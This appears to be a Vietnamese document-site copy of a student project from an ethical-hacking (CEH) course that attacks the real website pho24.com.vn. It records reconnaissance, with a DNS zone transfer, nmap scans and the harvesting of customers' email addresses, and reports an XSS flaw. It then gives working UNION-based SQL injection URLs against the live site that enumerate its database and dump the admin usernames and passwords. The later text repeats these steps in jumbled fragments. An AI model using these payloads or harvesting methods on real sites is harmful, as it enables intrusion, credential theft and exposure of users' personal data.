Khai thác lỗi bảo mật của trang web pho24.com.vn

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang	18
Dung lượng	1,61 MB

Nội dung

Khai thác lỗi bảo mật trang web pho24.com.vn Đồ án hết môn lớp CEH Khai giảng ngày 5/4/2012 – Tối 3,5,7 SVTT: Đặng Lê Nam GVHD:Nguyễn Hồ Phi Long Trang Khai thác lỗi bảo mật trang web pho24.com.vn MỤC LỤC Chương 1: Tìm hiểu đặc điểm tính chất trang web victim Footprinting: I Tìm hiểu domain pho24.com.vn Tìm hiểu domain sử dụng chung hosting với pho24.com.vn Tìm hiểu đường dẫn hacker công máy victim Khai thác email khách hàng email user sử dụng web victim II Scanning: Tìm hiểu port mở máy chủ pho24.com.vn Tìm hiểu thông tin hệ điều hành sử dụng máy chủ web Tìm hiểu webservice hoạt động máy chủ web III Tìm hiểu lỗi Web Application pho24.com.vn Lỗi Blind SQL Injection Lỗi XSS 11 Chương 2: Tấn công khai thác trang web victim SQL Injection 12 Tấn công khai thác trang web thủ công: 12 I Trang web truy cập bình thường với pid =35 12 Trang web bị lỗi với pid =35’ 12 Tìm số column để tiến hành khai thác 13 Tìm column gây lỗi: 14 Tìm tên database (Cơ sỡ liệu) website 15 Tìm tên bảng sỡ liệu 15 Tìm cột (trường liệu) bảng admin 16 Tìm username password người quản trị 16 II Tấn công khai thác trang web victim công cụ Havij 18 GVHD:Nguyễn Hồ Phi Long Trang Khai thác lỗi bảo mật trang web pho24.com.vn Chương 1: Tìm hiểu đặc điểm tính chất trang web victim I Footprinting: Tìm hiểu domain pho24.com.vn - Ở ta nhận thấy pho24.com.vn sử dụng domain ta vào vnnic.vn để truy vết sở hữu tên miền - Ta sử dụng command promt windows để truy vết máy chủ victim GVHD:Nguyễn Hồ Phi Long Trang Khai thác lỗi bảo mật trang web pho24.com.vn  Ta thấy ta kết nối với dns server pho24.com.vn (bằng lệnh ls –d pho24.com.vn) truy xuất zone máy đặt dns ta dò tìm máy google mò giống máy ftp (ftp.pho24.com.vn) mà GVHD:Nguyễn Hồ Phi Long Trang Khai thác lỗi bảo mật trang web pho24.com.vn  Ta thấy mail server ftp server nằm địa 221.132.37.135 máy ns.pho24.com.vn máy ns1.lisdns.net nhà cung cấp FPT, đặc biệt máy khác máy chủ làm web 221.132.37.133 Tìm hiểu domain sử dụng chung hosting với pho24.com.vn  Ta thấy có 33 domains sử dụng chung hosting với pho24.com.vn ta kết luận pho24.com.vn sử dụng shared host Tìm hiểu đường dẫn hacker công máy victim - Sử dụng công cụ trace route internet ta thấy qua 15 hops count hacker (206.123.64.42) đến máy victim (221.132.37.133) GVHD:Nguyễn Hồ Phi Long Trang Khai thác lỗi bảo mật trang web pho24.com.vn - Sử dụng phần mềm neotrace để thấy đường đến máy victim rõ ràng GVHD:Nguyễn Hồ Phi Long Trang Khai thác lỗi bảo mật trang web pho24.com.vn Khai thác email khách hàng email user sử dụng web victim - Sử dụng chương trình 1st Email Address Spider 2006 giúp ta tìm thông tin email khách hàng user sử dụng trang web pho24.com.vn cách nhanh chóng II Scanning: Tìm hiểu port mở máy chủ pho24.com.vn Nmap –sS –PN pho24.com.vn GVHD:Nguyễn Hồ Phi Long Trang Khai thác lỗi bảo mật trang web pho24.com.vn Tìm hiểu thông tin hệ điều hành sử dụng máy chủ web Nmap –0 – p 80 –PN pho24.com.vn GVHD:Nguyễn Hồ Phi Long Trang Khai thác lỗi bảo mật trang web pho24.com.vn Tìm hiểu webservice hoạt động máy chủ web Nmap –sV –p 80 –PN pho24.com.vn III Tìm hiểu lỗi Web Application pho24.com.vn Lỗi Blind SQL Injection - Ta thấy có tham số để khai thác lỗi sql injection city, district, php_id, pid GVHD:Nguyễn Hồ Phi Long Trang Khai thác lỗi bảo mật trang web pho24.com.vn - Ta sử dung phần mềm acunetix Web Vulnerability Scanner vừa quét lỗi test lỗi trực tiếp phần mềm Ví dụ: ta khai thác lỗi Blind SQL injection tham số city GVHD:Nguyễn Hồ Phi Long Trang 10 Khai thác lỗi bảo mật trang web pho24.com.vn Lỗi XSS - Ta thấy lỗi XSS tham số language - Ta chèn script trang web GVHD:Nguyễn Hồ Phi Long Trang 11 Khai thác lỗi bảo mật trang web pho24.com.vn Chương 2: Tấn công khai thác trang web victim SQL Injection I Tấn công khai thác trang web thủ công: Trang web truy cập bình thường với pid =35 Trang web bị lỗi với pid =35’ - Lỗi inject biến pid - Trang web không thấy nội dung GVHD:Nguyễn Hồ Phi Long Trang 12 Khai thác lỗi bảo mật trang web pho24.com.vn Tìm số column để tiến hành khai thác - Sử dụng toán tử order by { số column tăng dần ) để đoán column - Ta thấy column 14 trang web bắt đầu không thấy nội dung - Giảm column 13 trang web trờ lại bình thường  Giá trị columns khai thác 13 GVHD:Nguyễn Hồ Phi Long Trang 13 Khai thác lỗi bảo mật trang web pho24.com.vn Tìm column gây lỗi: - Cú pháp câu lệnh: http://pho24.com.vn/htmls/index.php?f=menu_a_details.php&cur=2&pho=1&pho_id=2&pid=35%2 0union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 GVHD:Nguyễn Hồ Phi Long Trang 14 Khai thác lỗi bảo mật trang web pho24.com.vn Tìm tên database (Cơ sỡ liệu) website - Cú pháp câu lệnh: http://pho24.com.vn/htmls/index.php?f=menu_a_details.php&cur=2&pho=1&pho_id=2&pid=-35 UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat(schema_name),11,12,13 from information_schema.schemata Tìm tên bảng sỡ liệu - Cú pháp câu lệnh: http://pho24.com.vn/htmls/index.php?f=menu_a_details.php&cur=2&pho=1&pho_id=2&pid=-35 UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat(table_name),11,12,13 from information_schema.tables where table_schema=database() GVHD:Nguyễn Hồ Phi Long Trang 15 Khai thác lỗi bảo mật trang web pho24.com.vn Tìm cột (trường liệu) bảng admin - Cú pháp câu lệnh: http://pho24.com.vn/htmls/index.php?f=menu_a_details.php&cur=2&pho=1&pho_id=2&pid=-35 UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat(column_name),11,12,13 from information_schema.columns where table_name=0x61646d696e Tìm username password người quản trị - Cú pháp câu lệnh: GVHD:Nguyễn Hồ Phi Long Trang 16 Khai thác lỗi bảo mật trang web pho24.com.vn http://pho24.com.vn/htmls/index.php?f=menu_a_details.php&cur=2&pho=1&pho_id=2&pid=-35 UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat(username),11,group_concat(password),13 from admin GVHD:Nguyễn Hồ Phi Long Trang 17 Khai thác lỗi bảo mật trang web pho24.com.vn II Tấn công khai thác trang web victim công cụ Havij GVHD:Nguyễn Hồ Phi Long Trang 18 [...].. .Khai thác lỗi bảo mật của trang web pho24.com.vn 2 Lỗi XSS - Ta thấy lỗi XSS ở tham số language - Ta có thể chèn script ngay trên trang web GVHD:Nguyễn Hồ Phi Long Trang 11 Khai thác lỗi bảo mật của trang web pho24.com.vn Chương 2: Tấn công và khai thác trang web victim bằng SQL Injection I Tấn công và khai thác trang web bằng thủ công: 1 Trang web truy cập bình thường với pid =35 2 Trang web bị lỗi. .. khai thác là 13 GVHD:Nguyễn Hồ Phi Long Trang 13 Khai thác lỗi bảo mật của trang web pho24.com.vn 4 Tìm các column gây ra lỗi: - Cú pháp câu lệnh: http:/ /pho24.com.vn/ htmls/index.php?f=menu_a_details.php&cur=2&pho=1&pho_id=2&pid=35%2 0union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 GVHD:Nguyễn Hồ Phi Long Trang 14 Khai thác lỗi bảo mật của trang web pho24.com.vn 5 Tìm tên database (Cơ sỡ dữ liệu) của website... GVHD:Nguyễn Hồ Phi Long Trang 16 Khai thác lỗi bảo mật của trang web pho24.com.vn http:/ /pho24.com.vn/ htmls/index.php?f=menu_a_details.php&cur=2&pho=1&pho_id=2&pid=-35 UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat(username),11,group_concat(password),13 from admin GVHD:Nguyễn Hồ Phi Long Trang 17 Khai thác lỗi bảo mật của trang web pho24.com.vn II Tấn công và khai thác trang web victim bằng công cụ Havij... - Lỗi inject tại biến pid - Trang web không thấy được nội dung GVHD:Nguyễn Hồ Phi Long Trang 12 Khai thác lỗi bảo mật của trang web pho24.com.vn 3 Tìm số column để tiến hành khai thác - Sử dụng toán tử order by { số column tăng dần ) để đoán column - Ta thấy column 14 thì trang web bắt đầu không thấy nội dung nữa - Giảm column còn 13 thì trang web trờ lại bình thường  Giá trị columns chúng ta sẽ khai. .. GVHD:Nguyễn Hồ Phi Long Trang 15 Khai thác lỗi bảo mật của trang web pho24.com.vn 7 Tìm các cột (trường dữ liệu) của bảng admin - Cú pháp câu lệnh: http:/ /pho24.com.vn/ htmls/index.php?f=menu_a_details.php&cur=2&pho=1&pho_id=2&pid=-35 UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat(column_name),11,12,13 from information_schema.columns where table_name=0x61646d696e 8 Tìm username và password của người quản trị... pho24.com.vn 5 Tìm tên database (Cơ sỡ dữ liệu) của website - Cú pháp câu lệnh: http:/ /pho24.com.vn/ htmls/index.php?f=menu_a_details.php&cur=2&pho=1&pho_id=2&pid=-35 UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat(schema_name),11,12,13 from information_schema.schemata 6 Tìm tên các bảng trong cơ sỡ dữ liệu - Cú pháp câu lệnh: http:/ /pho24.com.vn/ htmls/index.php?f=menu_a_details.php&cur=2&pho=1&pho_id=2&pid=-35... 1,2,3,4,5,6,7,8,9,group_concat(username),11,group_concat(password),13 from admin GVHD:Nguyễn Hồ Phi Long Trang 17 Khai thác lỗi bảo mật của trang web pho24.com.vn II Tấn công và khai thác trang web victim bằng công cụ Havij GVHD:Nguyễn Hồ Phi Long Trang 18 ... script trang web GVHD:Nguyễn Hồ Phi Long Trang 11 Khai thác lỗi bảo mật trang web pho24.com.vn Chương 2: Tấn công khai thác trang web victim SQL Injection I Tấn công khai thác trang web thủ công: Trang. .. Phi Long Trang Khai thác lỗi bảo mật trang web pho24.com.vn - Sử dụng phần mềm neotrace để thấy đường đến máy victim rõ ràng GVHD:Nguyễn Hồ Phi Long Trang Khai thác lỗi bảo mật trang web pho24.com.vn. .. quét lỗi test lỗi trực tiếp phần mềm Ví dụ: ta khai thác lỗi Blind SQL injection tham số city GVHD:Nguyễn Hồ Phi Long Trang 10 Khai thác lỗi bảo mật trang web pho24.com.vn Lỗi XSS - Ta thấy lỗi

Ngày đăng: 25/03/2016, 17:03

Xem thêm